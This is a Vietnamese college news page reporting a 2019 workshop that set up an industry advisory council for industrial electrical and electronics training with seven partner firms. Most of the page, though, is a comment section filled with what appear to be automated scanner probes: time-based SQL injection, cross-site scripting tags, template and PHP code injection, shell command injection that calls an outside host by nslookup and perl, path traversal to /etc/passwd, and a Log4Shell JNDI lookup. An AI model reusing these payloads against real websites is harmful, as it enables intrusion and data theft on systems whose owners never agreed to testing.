Hội thảo Tư vấn Nghề cho nghề Điện công nghiệp và Điện tử công nghiệp của trường Cao đẳng nghề Ninh Thuận
25-04-2024 10:26 SA
Hội thảo Khởi động Hội đồng Tư vấn Nghề cho nghề điện công nghiệp và điện tử công nghiệp đã được tổ chức ngày 23 tháng 12 năm 2019 tại trường Trường Cao Đẳng nghề Ninh Thuận đánh dấu mốc quan trọng trong việc hợp tác đào tạo giữa nhà trường với 7 doanh nghiệp đối tác chủ chốt.

Tham gia cuộc họp có các lãnh đạo và đại diện đến từ Sở Lao động - Thương Binh và Xã Hội tỉnh Ninh Thuận (DoLISA Ninh Thuận) và 7 doanh nghiệp gồm Công ty Thiết kế Điện Bách Khoa, Công ty Song Hưng Thuận,  Công ty Điện Mặt trời DLG Ninh Thuận, Nhà máy Điện gió Mũi Dinh, Nhà máy Điện mặt trời Thuận Nam 19, Công ty Liên Thành Việt Nam, Công ty Bao bì Á Đông Ninh Thuận.

Tại cuộc họp, các đại biểu đã thảo luận và thống nhất về mô hình đào tạo phối hợp, quy chế hoạt động và thành phần của Hội đồng tư vấn, vai trò và nhiệm vụ của thành viên. Các đại biểu cũng đã xác định những vấn đề trọng tâm hợp tác bao gồm xây dựng và cập nhật chuẩn đầu ra và chương trình đào tạo, thực hiện đào tạo thực hành tại doanh nghiệp và đánh giá kỹ năng thực hành của sinh viên. Kết thúc cuộc họp, Biên bản Ghi nhớ làm căn cứ cho việc thành lập và hoạt động của Hội đồng Tư vấn nghề của nghề điện công nghiệp và điện tử công nghiệp đã được ký kết giữa Trường Cao đẳng nghề Ninh Thuận, DoLISA Ninh Thuận và 7 doanh nghiệp đối tác. Ông Đàng Xuân Chiến, Giám đốc Công ty Tư vấn Thiết kế Điện Bách Khoa khẳng định: “Việc thành lập Hội đồng Tư vấn Nghề là cơ sở vững chắc để có một mối quan hệ hợp tác chặt chẽ và hiệu quả giữa doanh nghiệp với trường trong đào tạo nhân lực. Tôi tin rằng mô hình đào tạo phối hợp sẽ thu hút ngày càng nhiều doanh nghiệp tham gia”.

Quỳnh Trân

 • Nguyễn Võ Quỳnh Trân
  Chia sẻ:

 • Bình luận
  Khách 22-07-2024 01:19 SA
  @@JuaHH
  Khách 22-07-2024 01:19 SA
  1����%2527%2522
  Khách 22-07-2024 01:19 SA
  1'"
  Khách 22-07-2024 01:19 SA
  '||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
  Khách 22-07-2024 01:19 SA
  *DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
  Khách 22-07-2024 01:19 SA
  wOp0qh4F')) OR 554=(SELECT 554 FROM PG_SLEEP(15))--
  Khách 22-07-2024 01:19 SA
  QCnLDoxA') OR 951=(SELECT 951 FROM PG_SLEEP(15))--
  Khách 22-07-2024 01:19 SA
  LT41nt5H' OR 433=(SELECT 433 FROM PG_SLEEP(15))--
  Khách 22-07-2024 01:19 SA
  -1)) OR 866=(SELECT 866 FROM PG_SLEEP(15))--
  Khách 22-07-2024 01:19 SA
  -5) OR 202=(SELECT 202 FROM PG_SLEEP(15))--
  Khách 22-07-2024 01:19 SA
  -5 OR 770=(SELECT 770 FROM PG_SLEEP(15))--
  Khách 22-07-2024 01:19 SA
  Tx1XbasW')); waitfor delay '0:0:15' --
  Khách 22-07-2024 01:19 SA
  QfQscTt3'); waitfor delay '0:0:15' --
  Khách 22-07-2024 01:19 SA
  WlcM1VA5'; waitfor delay '0:0:15' --
  Khách 22-07-2024 01:19 SA
  1 waitfor delay '0:0:15' --
  Khách 22-07-2024 01:18 SA
  -1)); waitfor delay '0:0:15' --
  Khách 22-07-2024 01:18 SA
  -1); waitfor delay '0:0:15' --
  Khách 22-07-2024 01:18 SA
  -1; waitfor delay '0:0:15' --
  Khách 22-07-2024 01:18 SA
  (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
  Khách 22-07-2024 01:18 SA
  0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
  Khách 22-07-2024 01:18 SA
  0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
  Khách 22-07-2024 01:18 SA
  if(now()=sysdate(),sleep(15),0)
  Khách 22-07-2024 01:18 SA
  -1 OR 3+885-885-1=0+0+0+1
  Khách 22-07-2024 01:18 SA
  -1 OR 2+885-885-1=0+0+0+1
  Khách 22-07-2024 01:18 SA
  1*
  Khách 22-07-2024 01:18 SA
  1*
  Khách 22-07-2024 01:18 SA
  1*
  Khách 22-07-2024 01:18 SA
  1*
  Khách 22-07-2024 01:18 SA
  geBHMB7M
  Khách 22-07-2024 12:31 SA
  @@n6X9H
  Khách 22-07-2024 12:31 SA
  1����%2527%2522
  Khách 22-07-2024 12:31 SA
  1'"
  Khách 22-07-2024 12:31 SA
  '||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
  Khách 22-07-2024 12:31 SA
  *DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
  Khách 22-07-2024 12:31 SA
  wuTqNpVZ')) OR 301=(SELECT 301 FROM PG_SLEEP(15))--
  Khách 22-07-2024 12:31 SA
  Di4hg9BW') OR 704=(SELECT 704 FROM PG_SLEEP(15))--
  Khách 22-07-2024 12:31 SA
  NyxkpyXO' OR 716=(SELECT 716 FROM PG_SLEEP(15))--
  Khách 22-07-2024 12:31 SA
  -1)) OR 569=(SELECT 569 FROM PG_SLEEP(15))--
  Khách 22-07-2024 12:31 SA
  -5) OR 400=(SELECT 400 FROM PG_SLEEP(15))--
  Khách 22-07-2024 12:31 SA
  -5 OR 757=(SELECT 757 FROM PG_SLEEP(15))--
  Khách 22-07-2024 12:31 SA
  r1ETLVGO')); waitfor delay '0:0:15' --
  Khách 22-07-2024 12:31 SA
  BAJ1R9Md'); waitfor delay '0:0:15' --
  Khách 22-07-2024 12:31 SA
  pgLNSSb2'; waitfor delay '0:0:15' --
  Khách 22-07-2024 12:31 SA
  1 waitfor delay '0:0:15' --
  Khách 22-07-2024 12:31 SA
  -1)); waitfor delay '0:0:15' --
  Khách 22-07-2024 12:31 SA
  -1); waitfor delay '0:0:15' --
  Khách 22-07-2024 12:31 SA
  -1; waitfor delay '0:0:15' --
  Khách 22-07-2024 12:31 SA
  (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
  Khách 22-07-2024 12:31 SA
  0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
  Khách 22-07-2024 12:31 SA
  0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
  Khách 22-07-2024 12:31 SA
  if(now()=sysdate(),sleep(15),0)
  Khách 22-07-2024 12:31 SA
  -1 OR 3+833-833-1=0+0+0+1
  Khách 22-07-2024 12:31 SA
  -1 OR 2+833-833-1=0+0+0+1
  Khách 22-07-2024 12:31 SA
  1*
  Khách 22-07-2024 12:31 SA
  1*
  Khách 22-07-2024 12:31 SA
  1*
  Khách 22-07-2024 12:31 SA
  1*
  Khách 22-07-2024 12:31 SA
  1olQ9sHy
  Khách 21-07-2024 11:08 CH
  @@z6d20
  Khách 21-07-2024 11:08 CH
  1����%2527%2522
  Khách 21-07-2024 11:08 CH
  1'"
  Khách 21-07-2024 11:08 CH
  '||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
  Khách 21-07-2024 11:08 CH
  *DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
  Khách 21-07-2024 11:08 CH
  vbVcwe9Z')) OR 976=(SELECT 976 FROM PG_SLEEP(15))--
  Khách 21-07-2024 11:08 CH
  GqUEFd5t') OR 85=(SELECT 85 FROM PG_SLEEP(15))--
  Khách 21-07-2024 11:08 CH
  AjV2Ilpe' OR 552=(SELECT 552 FROM PG_SLEEP(15))--
  Khách 21-07-2024 11:08 CH
  -1)) OR 647=(SELECT 647 FROM PG_SLEEP(15))--
  Khách 21-07-2024 11:08 CH
  -5) OR 628=(SELECT 628 FROM PG_SLEEP(15))--
  Khách 21-07-2024 11:08 CH
  -5 OR 104=(SELECT 104 FROM PG_SLEEP(15))--
  Khách 21-07-2024 11:08 CH
  f0fsjmn3')); waitfor delay '0:0:15' --
  Khách 21-07-2024 11:08 CH
  exuCHblZ'); waitfor delay '0:0:15' --
  Khách 21-07-2024 11:08 CH
  JScFfrAS'; waitfor delay '0:0:15' --
  Khách 21-07-2024 11:08 CH
  1 waitfor delay '0:0:15' --
  Khách 21-07-2024 11:08 CH
  -1)); waitfor delay '0:0:15' --
  Khách 21-07-2024 11:08 CH
  -1); waitfor delay '0:0:15' --
  Khách 21-07-2024 11:08 CH
  -1; waitfor delay '0:0:15' --
  Khách 21-07-2024 11:08 CH
  (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
  Khách 21-07-2024 11:08 CH
  0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
  Khách 21-07-2024 11:08 CH
  0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
  Khách 21-07-2024 11:08 CH
  if(now()=sysdate(),sleep(15),0)
  Khách 21-07-2024 11:08 CH
  -1 OR 3+979-979-1=0+0+0+1
  Khách 21-07-2024 11:08 CH
  -1 OR 2+979-979-1=0+0+0+1
  Khách 21-07-2024 11:08 CH
  1*
  Khách 21-07-2024 11:08 CH
  1*
  Khách 21-07-2024 11:08 CH
  1*
  Khách 21-07-2024 11:08 CH
  1*
  Khách 21-07-2024 11:08 CH
  xCstO8nn
  Khách 21-07-2024 01:13 SA
  }body{acu:Expre/**/SSion(EX1R(9197))}
  Khách 21-07-2024 01:13 SA
  <ScRiPt>EX1R(9215)</sCripT>
  Khách 21-07-2024 01:13 SA
  %0D%0A%3C%53%63%52%69%50%74%20%3E%45%58%31%52%289024%29%3C%2F%73%43%72%69%70%54%3E
  Khách 21-07-2024 01:13 SA
  "acxzzzzzzzzbbbccccdddeeexca".replace("z","o")
  Khách 21-07-2024 01:13 SA
  acx__${98991*97996}__::.x
  Khách 21-07-2024 01:13 SA
  acx[[${98991*97996}]]xca
  Khách 21-07-2024 01:13 SA
  acx{{98991*97996}}xca
  Khách 21-07-2024 01:13 SA
  1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>
  Khách 21-07-2024 01:13 SA
  <%={{={@{#{${acx}}%>
  Khách 21-07-2024 01:12 SA
  acux6782��z1��z2a�bcxuca6782
  Khách 21-07-2024 01:12 SA
  acu10115<s1﹥s2ʺs3ʹuca10115
  Khách 21-07-2024 01:12 SA
  9225794<
  Khách 21-07-2024 01:12 SA
  9225794
  Khách 20-07-2024 12:04 CH
  }body{acu:Expre/**/SSion(gif4(9118))}
  Khách 20-07-2024 12:04 CH
  <ScRiPt>gif4(9362)</sCripT>
  Khách 20-07-2024 12:04 CH
  %0D%0A%3C%53%63%52%69%50%74%20%3E%67%69%66%34%289173%29%3C%2F%73%43%72%69%70%54%3E
  Khách 20-07-2024 12:04 CH
  "acxzzzzzzzzbbbccccdddeeexca".replace("z","o")
  Khách 20-07-2024 12:04 CH
  acx__${98991*97996}__::.x
  Khách 20-07-2024 12:04 CH
  acx[[${98991*97996}]]xca
  Khách 20-07-2024 12:04 CH
  acx{{98991*97996}}xca
  Khách 20-07-2024 12:04 CH
  1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>
  Khách 20-07-2024 12:03 CH
  <%={{={@{#{${acx}}%>
  Khách 20-07-2024 12:03 CH
  acux6111��z1��z2a�bcxuca6111
  Khách 20-07-2024 12:03 CH
  acu3503<s1﹥s2ʺs3ʹuca3503
  Khách 20-07-2024 12:03 CH
  9856749<
  Khách 20-07-2024 12:03 CH
  9856749
  Khách 20-07-2024 08:25 SA
  }body{acu:Expre/**/SSion(xOYd(9728))}
  Khách 20-07-2024 08:24 SA
  <ScRiPt>xOYd(9876)</sCripT>
  Khách 20-07-2024 08:24 SA
  %0D%0A%3C%53%63%52%69%50%74%20%3E%78%4F%59%64%289543%29%3C%2F%73%43%72%69%70%54%3E
  Khách 20-07-2024 08:23 SA
  "acxzzzzzzzzbbbccccdddeeexca".replace("z","o")
  Khách 20-07-2024 08:23 SA
  acx__${98991*97996}__::.x
  Khách 20-07-2024 08:23 SA
  acx[[${98991*97996}]]xca
  Khách 20-07-2024 08:23 SA
  acx{{98991*97996}}xca
  Khách 20-07-2024 08:23 SA
  1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>
  Khách 20-07-2024 08:23 SA
  <%={{={@{#{${acx}}%>
  Khách 20-07-2024 08:23 SA
  acux1175��z1��z2a�bcxuca1175
  Khách 20-07-2024 08:23 SA
  acu5403<s1﹥s2ʺs3ʹuca5403
  Khách 20-07-2024 08:23 SA
  9774364<
  Khách 20-07-2024 08:23 SA
  9774364
  Khách 20-07-2024 07:52 SA
  }body{acu:Expre/**/SSion(Rwn9(9433))}
  Khách 20-07-2024 07:52 SA
  <ScRiPt>Rwn9(9721)</sCripT>
  Khách 20-07-2024 07:52 SA
  %0D%0A%3C%53%63%52%69%50%74%20%3E%52%77%6E%39%289915%29%3C%2F%73%43%72%69%70%54%3E
  Khách 20-07-2024 07:51 SA
  "acxzzzzzzzzbbbccccdddeeexca".replace("z","o")
  Khách 20-07-2024 07:51 SA
  acx__${98991*97996}__::.x
  Khách 20-07-2024 07:51 SA
  acx[[${98991*97996}]]xca
  Khách 20-07-2024 07:51 SA
  acx{{98991*97996}}xca
  Khách 20-07-2024 07:51 SA
  1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>
  Khách 20-07-2024 07:51 SA
  <%={{={@{#{${acx}}%>
  Khách 20-07-2024 07:51 SA
  acux6382��z1��z2a�bcxuca6382
  Khách 20-07-2024 07:51 SA
  acu1206<s1﹥s2ʺs3ʹuca1206
  Khách 20-07-2024 07:51 SA
  9951834<
  Khách 20-07-2024 07:51 SA
  9951834
  Khách 20-07-2024 07:34 SA
  }body{acu:Expre/**/SSion(sh7m(9977))}
  Khách 20-07-2024 07:34 SA
  <ScRiPt>sh7m(9061)</sCripT>
  Khách 20-07-2024 07:34 SA
  %0D%0A%3C%53%63%52%69%50%74%20%3E%73%68%37%6D%289993%29%3C%2F%73%43%72%69%70%54%3E
  Khách 20-07-2024 07:34 SA
  "acxzzzzzzzzbbbccccdddeeexca".replace("z","o")
  Khách 20-07-2024 07:34 SA
  acx__${98991*97996}__::.x
  Khách 20-07-2024 07:34 SA
  acx[[${98991*97996}]]xca
  Khách 20-07-2024 07:34 SA
  acx{{98991*97996}}xca
  Khách 20-07-2024 07:34 SA
  1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>
  Khách 20-07-2024 07:34 SA
  <%={{={@{#{${acx}}%>
  Khách 20-07-2024 07:34 SA
  acux4560��z1��z2a�bcxuca4560
  Khách 20-07-2024 07:34 SA
  acu8396<s1﹥s2ʺs3ʹuca8396
  Khách 20-07-2024 07:34 SA
  9555262<
  Khách 20-07-2024 07:34 SA
  9555262
  Khách 20-07-2024 07:17 SA
  }body{acu:Expre/**/SSion(5ozS(9231))}
  Khách 20-07-2024 07:17 SA
  <ScRiPt>5ozS(9194)</sCripT>
  Khách 20-07-2024 07:17 SA
  %0D%0A%3C%53%63%52%69%50%74%20%3E%35%6F%7A%53%289782%29%3C%2F%73%43%72%69%70%54%3E
  Khách 20-07-2024 07:17 SA
  "acxzzzzzzzzbbbccccdddeeexca".replace("z","o")
  Khách 20-07-2024 07:17 SA
  acx__${98991*97996}__::.x
  Khách 20-07-2024 07:17 SA
  acx[[${98991*97996}]]xca
  Khách 20-07-2024 07:17 SA
  acx{{98991*97996}}xca
  Khách 20-07-2024 07:17 SA
  1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>
  Khách 20-07-2024 07:17 SA
  <%={{={@{#{${acx}}%>
  Khách 20-07-2024 07:17 SA
  acux7152��z1��z2a�bcxuca7152
  Khách 20-07-2024 07:17 SA
  acu4821<s1﹥s2ʺs3ʹuca4821
  Khách 20-07-2024 07:17 SA
  9533628<
  Khách 20-07-2024 07:17 SA
  9533628
  Khách 20-07-2024 06:59 SA
  }body{acu:Expre/**/SSion(SMNm(9507))}
  Khách 20-07-2024 06:59 SA
  <ScRiPt>SMNm(9816)</sCripT>
  Khách 20-07-2024 06:59 SA
  %0D%0A%3C%53%63%52%69%50%74%20%3E%53%4D%4E%6D%289499%29%3C%2F%73%43%72%69%70%54%3E
  Khách 20-07-2024 06:58 SA
  "acxzzzzzzzzbbbccccdddeeexca".replace("z","o")
  Khách 20-07-2024 06:58 SA
  acx__${98991*97996}__::.x
  Khách 20-07-2024 06:58 SA
  acx[[${98991*97996}]]xca
  Khách 20-07-2024 06:58 SA
  acx{{98991*97996}}xca
  Khách 20-07-2024 06:58 SA
  1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>
  Khách 20-07-2024 06:58 SA
  <%={{={@{#{${acx}}%>
  Khách 20-07-2024 06:58 SA
  acux5384��z1��z2a�bcxuca5384
  Khách 20-07-2024 06:58 SA
  acu1636<s1﹥s2ʺs3ʹuca1636
  Khách 20-07-2024 06:58 SA
  9201879<
  Khách 20-07-2024 06:58 SA
  9201879
  Khách 20-07-2024 02:44 SA
  @@oClyj
  Khách 20-07-2024 02:44 SA
  1����%2527%2522
  Khách 20-07-2024 02:44 SA
  1'"
  Khách 20-07-2024 02:44 SA
  '||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
  Khách 20-07-2024 02:44 SA
  *DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
  Khách 20-07-2024 02:43 SA
  Hvn2UYPb')) OR 954=(SELECT 954 FROM PG_SLEEP(15))--
  Khách 20-07-2024 02:43 SA
  UmkGdLv1') OR 871=(SELECT 871 FROM PG_SLEEP(15))--
  Khách 20-07-2024 02:43 SA
  3iuKRzzj' OR 763=(SELECT 763 FROM PG_SLEEP(15))--
  Khách 20-07-2024 02:43 SA
  -1)) OR 903=(SELECT 903 FROM PG_SLEEP(15))--
  Khách 20-07-2024 02:43 SA
  -5) OR 38=(SELECT 38 FROM PG_SLEEP(15))--
  Khách 20-07-2024 02:43 SA
  -5 OR 779=(SELECT 779 FROM PG_SLEEP(15))--
  Khách 20-07-2024 02:43 SA
  jkL3yHKR')); waitfor delay '0:0:15' --
  Khách 20-07-2024 02:43 SA
  lhtQyAIH'); waitfor delay '0:0:15' --
  Khách 20-07-2024 02:42 SA
  0wcDkKA1'; waitfor delay '0:0:15' --
  Khách 20-07-2024 02:42 SA
  1 waitfor delay '0:0:15' --
  Khách 20-07-2024 02:42 SA
  -1)); waitfor delay '0:0:15' --
  Khách 20-07-2024 02:42 SA
  -1); waitfor delay '0:0:15' --
  Khách 20-07-2024 02:41 SA
  -1; waitfor delay '0:0:15' --
  Khách 20-07-2024 02:41 SA
  (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
  Khách 20-07-2024 02:41 SA
  0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
  Khách 20-07-2024 02:41 SA
  0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
  Khách 20-07-2024 02:40 SA
  if(now()=sysdate(),sleep(15),0)
  Khách 20-07-2024 02:40 SA
  -1 OR 3+719-719-1=0+0+0+1
  Khách 20-07-2024 02:40 SA
  -1 OR 2+719-719-1=0+0+0+1
  Khách 20-07-2024 02:40 SA
  1*
  Khách 20-07-2024 02:40 SA
  1*
  Khách 20-07-2024 02:40 SA
  1*
  Khách 20-07-2024 02:40 SA
  1*
  Khách 20-07-2024 02:40 SA
  y75bwjZd
  Khách 20-07-2024 02:11 SA
  9259853
  Khách 20-07-2024 02:10 SA
  '"
  Khách 20-07-2024 02:10 SA
  138/.
  Khách 20-07-2024 02:10 SA
  138
  Khách 20-07-2024 02:10 SA
  138
  Khách 20-07-2024 02:10 SA
  /xfs.bxss.me
  Khách 20-07-2024 02:10 SA
  )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
  Khách 20-07-2024 02:10 SA
  ".gethostbyname(lc("hitnd"."usrcoceke478b.bxss.me."))."A".chr(67).chr(hex("58")).chr(109).chr(87).chr(113).chr(83)."
  Khách 20-07-2024 02:10 SA
  '.print(md5(31337)).'
  Khách 20-07-2024 02:10 SA
  ${@print(md5(31337))}\
  Khách 20-07-2024 02:10 SA
  ${@print(md5(31337))}
  Khách 20-07-2024 02:10 SA
  ";print(md5(31337));$a="
  Khách 20-07-2024 02:10 SA
  ';print(md5(31337));$a='
  Khách 20-07-2024 02:10 SA
  ;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
  Khách 20-07-2024 02:10 SA
  '+'A'.concat(70-3).concat(22*4).concat(108).concat(84).concat(107).concat(72)+(require'socket' Socket.gethostbyname('hitns'+'deqfzqmv82386.bxss.me.')[3].to_s)+'
  Khách 20-07-2024 02:10 SA
  "+"A".concat(70-3).concat(22*4).concat(117).concat(67).concat(117).concat(71)+(require"socket" Socket.gethostbyname("hitsr"+"dqepkespe42d1.bxss.me.")[3].to_s)+"
  Khách 20-07-2024 02:10 SA
  '.gethostbyname(lc('hitkr'.'ddawjdoxce013.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(116).chr(69).chr(120).chr(89).'
  Khách 20-07-2024 02:10 SA
  bxss.me/t/xss.html?%00
  Khách 20-07-2024 02:10 SA
  HttP://bxss.me/t/xss.html?%00
  Khách 20-07-2024 02:10 SA
  ctime sleep p0 (I30 tp1 Rp2 .
  Khách 20-07-2024 02:10 SA
  bxss.me
  Khách 20-07-2024 02:10 SA
  http://bxss.me/t/fit.txt?.jpg
  Khách 20-07-2024 02:10 SA
  Http://bxss.me/t/fit.txt
  Khách 20-07-2024 02:10 SA
  1some_inexistent_file_with_long_name.jpg
  Khách 20-07-2024 02:10 SA
  http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg
  Khách 20-07-2024 02:10 SA
  '"()
  Khách 20-07-2024 02:10 SA
  ^(#$!@#$)(()))******
  Khách 20-07-2024 02:10 SA
  !(()&&!|*|*|
  Khách 20-07-2024 02:10 SA
  )
  Khách 20-07-2024 02:10 SA
  ;(nslookup hitdbmouqeuyb2876d.bxss.me||perl -e "gethostbyname('hitdbmouqeuyb2876d.bxss.me')")|(nslookup hitdbmouqeuyb2876d.bxss.me||perl -e "gethostbyname('hitdbmouqeuyb2876d.bxss.me')")&(nslookup hitdbmouqeuyb2876d.bxss.me||perl -e "gethostbyname('hitdbmouqeuyb2876d.bxss.me')")
  Khách 20-07-2024 02:10 SA
  `(nslookup hitdjvyrtztns64d12.bxss.me||perl -e "gethostbyname('hitdjvyrtztns64d12.bxss.me')")`
  Khách 20-07-2024 02:10 SA
  |(nslookup hituvbzowxxvr87fd2.bxss.me||perl -e "gethostbyname('hituvbzowxxvr87fd2.bxss.me')")
  Khách 20-07-2024 02:10 SA
  &(nslookup hitbkjsenlfqf1749c.bxss.me||perl -e "gethostbyname('hitbkjsenlfqf1749c.bxss.me')")&'\"`0&(nslookup hitbkjsenlfqf1749c.bxss.me||perl -e "gethostbyname('hitbkjsenlfqf1749c.bxss.me')")&`'
  Khách 20-07-2024 02:10 SA
  $(nslookup hitcqttrbpvqr2c1fa.bxss.me||perl -e "gethostbyname('hitcqttrbpvqr2c1fa.bxss.me')")
  Khách 20-07-2024 02:10 SA
  (nslookup hitxmupoylfdwe4750.bxss.me||perl -e "gethostbyname('hitxmupoylfdwe4750.bxss.me')")
  Khách 20-07-2024 02:10 SA
  |echo qtzyep$()\ xitnzb\nz^xyu||a #' |echo qtzyep$()\ xitnzb\nz^xyu||a #|" |echo qtzyep$()\ xitnzb\nz^xyu||a #
  Khách 20-07-2024 02:10 SA
  &echo bjbcth$()\ kuccot\nz^xyu||a #' &echo bjbcth$()\ kuccot\nz^xyu||a #|" &echo bjbcth$()\ kuccot\nz^xyu||a #
  Khách 20-07-2024 02:10 SA
  echo mcdieg$()\ fhqvqe\nz^xyu||a #' &echo mcdieg$()\ fhqvqe\nz^xyu||a #|" &echo mcdieg$()\ fhqvqe\nz^xyu||a #
  Khách 20-07-2024 02:09 SA
  &n980991=v907382
  Khách 20-07-2024 02:09 SA
  ${9999723+10000143}
  Khách 20-07-2024 02:09 SA
  ./
  Khách 20-07-2024 02:09 SA
  ../
  Khách 20-07-2024 02:09 SA
  ../../../../../../../../../../../../../../windows/win.ini
  Khách 20-07-2024 02:09 SA
  12345'"\'\");|]*{ <>�''💡
  Khách 20-07-2024 02:09 SA
  ../../../../../../../../../../../../../../etc/passwd
  Khách 20-07-2024 02:09 SA
  dp4C6JR3
  Khách 20-07-2024 02:09 SA
  ${j${::-n}di:dns${::-:}//hitgbwalgzetlb6b07${::-.}bxss.me}
  Khách 20-07-2024 02:09 SA
  /../../../../../../../../../../windows/system32/BITSADMIN.exe
  Khách 20-07-2024 02:09 SA
  "+response.write(9701119*9900994)+"
  Khách 20-07-2024 02:09 SA
  '+response.write(9701119*9900994)+'
  Khách 20-07-2024 02:09 SA
  response.write(9701119*9900994)
  Khách 20-07-2024 02:09 SA
  1ZYDcRxcAO
  Khách 19-07-2024 11:20 CH
  @@kKiWu
  Khách 19-07-2024 11:20 CH
  1����%2527%2522
  Khách 19-07-2024 11:20 CH
  1'"
  Khách 19-07-2024 11:20 CH
  '||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
  Khách 19-07-2024 11:20 CH
  *DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
  Khách 19-07-2024 11:20 CH
  xr4FXCgw')) OR 531=(SELECT 531 FROM PG_SLEEP(15))--
  Khách 19-07-2024 11:19 CH
  ZsyUUM8A') OR 165=(SELECT 165 FROM PG_SLEEP(15))--
  Khách 19-07-2024 11:19 CH
  2XPJcBr8' OR 891=(SELECT 891 FROM PG_SLEEP(15))--
  Khách 19-07-2024 11:19 CH
  -1)) OR 293=(SELECT 293 FROM PG_SLEEP(15))--
  Khách 19-07-2024 11:19 CH
  -5) OR 296=(SELECT 296 FROM PG_SLEEP(15))--
  Khách 19-07-2024 11:19 CH
  -5 OR 827=(SELECT 827 FROM PG_SLEEP(15))--
  Khách 19-07-2024 11:19 CH
  SYj5fH5S')); waitfor delay '0:0:15' --
  Khách 19-07-2024 11:18 CH
  MpZdqXTN'); waitfor delay '0:0:15' --
  Khách 19-07-2024 11:18 CH
  X1dLaBfC'; waitfor delay '0:0:15' --
  Khách 19-07-2024 11:18 CH
  1 waitfor delay '0:0:15' --
  Khách 19-07-2024 11:18 CH
  -1)); waitfor delay '0:0:15' --
  Khách 19-07-2024 11:17 CH
  -1); waitfor delay '0:0:15' --
  Khách 19-07-2024 11:17 CH
  -1; waitfor delay '0:0:15' --
  Khách 19-07-2024 11:17 CH
  (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
  Khách 19-07-2024 11:16 CH
  0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
  Khách 19-07-2024 11:16 CH
  0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
  Khách 19-07-2024 11:16 CH
  if(now()=sysdate(),sleep(15),0)
  Khách 19-07-2024 11:16 CH
  -1 OR 3+545-545-1=0+0+0+1
  Khách 19-07-2024 11:16 CH
  -1 OR 2+545-545-1=0+0+0+1
  Khách 19-07-2024 11:16 CH
  1*
  Khách 19-07-2024 11:16 CH
  1*
  Khách 19-07-2024 11:16 CH
  1*
  Khách 19-07-2024 11:16 CH
  1*
  Khách 19-07-2024 11:16 CH
  7TZgASZx
  Khách 19-07-2024 10:52 CH
  9156502
  Khách 19-07-2024 10:52 CH
  138/.
  Khách 19-07-2024 10:52 CH
  138
  Khách 19-07-2024 10:52 CH
  138
  Khách 19-07-2024 10:51 CH
  '.print(md5(31337)).'
  Khách 19-07-2024 10:51 CH
  ${@print(md5(31337))}\
  Khách 19-07-2024 10:51 CH
  ${@print(md5(31337))}
  Khách 19-07-2024 10:51 CH
  ";print(md5(31337));$a="
  Khách 19-07-2024 10:51 CH
  ';print(md5(31337));$a='
  Khách 19-07-2024 10:51 CH
  ;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
  Khách 19-07-2024 10:51 CH
  /xfs.bxss.me
  Khách 19-07-2024 10:51 CH
  '"
  Khách 19-07-2024 10:51 CH
  bxss.me/t/xss.html?%00
  Khách 19-07-2024 10:51 CH
  )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
  Khách 19-07-2024 10:51 CH
  12345'"\'\");|]*{ <>�''💡
  Khách 19-07-2024 10:51 CH
  HttP://bxss.me/t/xss.html?%00
  Khách 19-07-2024 10:51 CH
  '+'A'.concat(70-3).concat(22*4).concat(107).concat(67).concat(102).concat(65)+(require'socket' Socket.gethostbyname('hitgk'+'jqrchnwk3ae0e.bxss.me.')[3].to_s)+'
  Khách 19-07-2024 10:51 CH
  "+"A".concat(70-3).concat(22*4).concat(113).concat(68).concat(99).concat(77)+(require"socket" Socket.gethostbyname("hitxg"+"ugegcssv4e721.bxss.me.")[3].to_s)+"
  Khách 19-07-2024 10:51 CH
  bxss.me
  Khách 19-07-2024 10:51 CH
  '"()
  Khách 19-07-2024 10:51 CH
  http://bxss.me/t/fit.txt?.jpg
  Khách 19-07-2024 10:51 CH
  Http://bxss.me/t/fit.txt
